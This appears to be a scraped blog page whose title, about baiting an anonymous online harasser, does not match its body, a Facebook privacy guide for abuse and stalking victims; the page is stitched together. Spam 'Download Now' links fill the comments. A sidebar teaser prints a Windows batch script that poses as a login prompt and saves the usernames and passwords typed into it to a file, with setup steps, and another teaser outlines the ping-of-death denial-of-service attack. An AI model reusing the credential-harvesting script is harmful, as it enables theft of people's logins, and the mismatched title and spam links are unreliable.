Skip to main content

How To Bait and Catch The Anonymous Person Harassing You On The Internet

Ready for some pretty creepy statistics? 53% of online harassment is committed by someone with prior relationship with the abused. 70% of reported incidents of stalking in the UK had an online component.


Here’s the bad news: If someone is really determined to find you, it’s not difficult for them to track you down. And to make matters worse, Facebook hasn’t made it easy for its users to protect themselves.
The good news? We can tell you how to change this to protect yourself and keep your Facebook private.
There are many ways someone can track you down and the chances and ease of this happening will depend heavily on your personal circumstances and that of your abuser/stalker. Keep reading to find out 4 ways someone can track you on Facebook, how easy it is, and most importantly, what you can do about it.


1. Status Updates & Public Profile

How They Can Find YouYou would be surprised how much of your profile is public. Most Facebook users aren’t completely aware of how to use the site’s privacy settings, which means that we post a lot of stuff to our social media accounts that we think is private but in reality is open for the world to see.
The best way to find out how much of your profile a random user can see is by using the “View As” Function that appears when you click on the “…” on the right corner of your Facebook cover photo. Try a mixture of options to see how people you know, don’t know, are from your city, from your university/school or friends of your friends can see about you. You can also create a new profile and then try to access your Facebook profile and check how much information you can see as a random account.
What You Can Do About ItYou should check how many of your profile photos, status updates and groups are public. Also, remember when you post you should set the privacy setting for each post to Friends Only rather than Public. Use the same discretion for location by turning it off and checking it every time you post. Turn off location settings in your phone! You should be able to do this through your phone settings.

2. Friends & Family

How They Can Find YouWho is in your friends list? Who is in your friends’ friends list? Who is checking you in to places? It’s easy to add people over time and forget about it. You may have common contacts with your abuser and they will be able to see your timeline if you set your post setting to “Friends”.
What You Can Do About ItUnfriending or Blocking a person are two options that Facebook offers for tackling someone who is or might bother you. Unfriending someone is easy but you might not realise how it is different from blocking someone. When you unfriend someone, it means your activities (pictures, updates, posts) that you set to the privacy setting “Friends” will no longer be seen by that person and their activities won’t appear on your timeline. They will still be able to see your public posts on your own walls, check-ins into public locations, and public events that you are hosting or attending. Don’t be startled if they send you a friend request again because this doesn’t mean you are undiscoverable. That only happens when you block someone. Blocking someone means they can’t see your timeline, message you, tag you, and send you friend requests. You won’t see their activity either.
This is what most people miss: People who are blocked can still see your public information and any activity within apps or groups. Check the groups you’re in and double check any pages or events you manage to see if you’re giving away information about your location you don’t want others to know.
You can always report inappropriate or abusive posts to Facebook.

3. Messenger

How They Can Find YouAre you getting messages from your partner or someone close to them on Facebook messenger? Be very careful because if location services are on your phone, your location will be transmitted. Also, never double tap a message you’ve sent on Messenger if you think it hasn’t been sent because that transmits your location to them.
What You Can Do About ItTurn off location services on your phone and if you can’t remember to do it (you need it for Google Maps etc), then don’t double tap the message you send on Messenger. And always change location on your status updates.

4. Check-ins

How They Can Find YouDo you like checking in to cafes, clubs and restaurants with your friends And more importantly, do you keep track of who tags you in check-ins? Check-ins are public if the person who checks you in or you put the privacy settings as “Public”, then everyone will be able to see where you are. This is same for connected Check-in apps such as Foursquare/Swarm.
What You Can Do About ItYou can’t block people from tagging you in a post that includes a location, but you can stop it from showing up on your Timeline. This is useful if you still haven’t left your partner or for some reason have common contacts on Facebook. As a basic measure security check, you need to turn on Timeline review to approve all tags before they show up on your Timeline and other people’s feeds. Remove tags from any location posts and check-ins that you don’t want. You can also trick your stalker/abuser by checking into place you’re not at if you’re afraid of being found.
These are just 4 ways an abuser or stalker can use monitoring on Facebook to find and harass you. And if this shocked you, wait till Chayn launches the “How Someone Can Track You (Online/Offline) & What You Can Do About It” guide later this year. The guide will cover more ways abusers and stalker monitor through social media, emails, hacking and more. We’re looking for feedback on what ways you think abusers can track someone. Tell us on Reddit here!

Comments

  1. How To Bait And Catch The Anonymous Person Harassing You On The Internet >>>>> Download Now

    >>>>> Download Full

    How To Bait And Catch The Anonymous Person Harassing You On The Internet >>>>> Download LINK

    >>>>> Download Now

    How To Bait And Catch The Anonymous Person Harassing You On The Internet >>>>> Download Full

    >>>>> Download LINK 6l

    ReplyDelete

Post a Comment

Popular posts from this blog

Create a key logger using cmd

Here is a basic  keylogger  script for beginners to understand the basics of how keylogging works in notepad. This script should be used for research purposes only. @echo off color a title Login cls echo Please Enter Email Adress And Password echo. echo. cd "C:Logs" set /p user=Username: set /p pass=Password: echo Username="%user%" Password="%pass%" >> Log.txt start >>Program Here<< exit Step 1:  Now paste the above code into Notepad and save it as a  Logger.bat  file. Step 2:  Make a new folder on the desktop and name it Logs ( If the folder is not called Logs, then it will not work.) Step 3:  Drag that folder in to the  C: Step 4:  Test out the  Logger.bat ! Related  All-in-one Messenger - FacebookMessenger, WhatsApp, Skype and many more in one window Step 5:  Alright, now once you test it, you will go back into the Logs folder in the  C: and a  .txt  file w...

Perform cmd death attack

 A ping packet can also be malformed to perform denial of service attack by sending continuous ping packets to the target IP address. A continuous ping will cause buffer overflow at the target system and will cause the target system to crash.  We often use the CMD command “Ping” to mostly check if a server or a gateway is up and running. But, ping command can also be used for some other purposes. If we look at the basic level, then a ping packet is generally of size 56 bytes or 84 bytes (including IP header as well). However, a ping packet can also be made as large as up to 65536 bytes. Well, that’s the negative side of the ping packet. When we increase the size of the ping packet unnaturally, forming a malformed ping packet to attack a computer system, this type of attack is called “Ping of death” attack. How Ping of Death attack works? Not all computers can handle data larger than a fixed size. So, when a ping of death packet is sent f...

What is DNS

D NS stands for Domain Name System is used to as the medium to translate domain names to their respective IP addresses when a client initiates a request query. DNS stores the database of all the domain names and their IP addresses which are registered on the network. Most of us are quite familiar with the term DNS or Domain Name System. DNS can be thought of as an attendance register for various websites present over the internet. In the case of DNS, it maintains the database of all the websites Domain Names and their IP (Internet Protocol) addresses that are operational all over the world. Historical Notes The origins of DNS date back to the time of the ARPANET  when there were only a few computers to get an entry in the database. A HOSTS.TXT file was maintained by Stanford Research Institute, which constituted the data of all the machines, and was copied by all the host machines to remain updated. Jon Postel from the Information Sciences Institute requested Pau...